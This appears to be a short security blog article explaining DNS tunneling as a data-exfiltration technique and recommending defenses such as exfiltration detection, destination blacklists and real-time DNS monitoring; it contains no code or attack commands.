Our internet world can only exist thanks to the DNS protocol, one of the oldest protocols on the internet. If DNS service goes down, network services simply stop working. However, it also became a popular target for today’s hackers, and are often subjected to various attacks- such as DNS tunneling.
DNS tunneling: technique and side effects
The DNS protocol is the equivalent of a phone book: you just have to know the domain name associated with the IP address in order to reach your website. But DNS tunneling is considered as a misuse of DNS protocol. It indeed enables the attacker to access a website- usually with the aim of performing data exfiltration. For that purpose, hackers exploit the flaws of DNS, which lie in its open nature.
In order to perform DNS tunneling, attackers use the protocol to establish a pathway (a tunnel) enabling them to access sensitive information for malicious purposes. DNS tunneling often includes malware. Any piece of information detained by hackers has a certain value and can be used by “hacktivists” trying to steal sensitive information for social or political purposes, or simply in order to commit fraud by stealing Social Security or credit card numbers or email addresses.
The effects of such attacks can be both long-lasting and damaging for companies for which customer confidentiality is a crucial element, but not only. If not all network administrators are aware of it, many of them do not even know how to stop it; indeed, DNS tunneling bypasses almost all firewalls. As a consequence, DNS tunneling can lead to serious consequences, including loss of revenue, customer defection, and deterioration of brand image.
It is indeed difficult to differentiate between a legitimate DNS query and DNS tunneling- which, still today, remains an overlooked threat and is often ignored by organisations.
Defending yourself against DNS data exfiltration
DNS tunneling is, of course, not the only attack; among the best-known attacks, there is also cache poisoning (which consists of the corruption of the DNS cache data) or phantom domain attack (where multiple “phantom” domains are set up).
IT administrators should be aware of the risks of data exfiltration. Cyber-attacks, such as DNS tunneling, have indeed become very popular over the past few years, and general security tools that most organisations usually use are inefficient against them. Adopting an efficient DNS security solutions would be the best option to protect your network system. They should include:
- A tool which identifies data exfiltration as it happens and thwart the attack;
- A blacklist of malicious destinations used for data exfiltration in order to prevent future data theft;
- A real-time monitoring of network traffic; it should be able to closely examine DNS queries and immediately detect abnormal activities;
Organisations should implement the tools adapted to their organisations and make sure their network is efficiently protected from these threats- especially data theft. IT administrators should remain vigilant and provide a safe and reliable network for their users.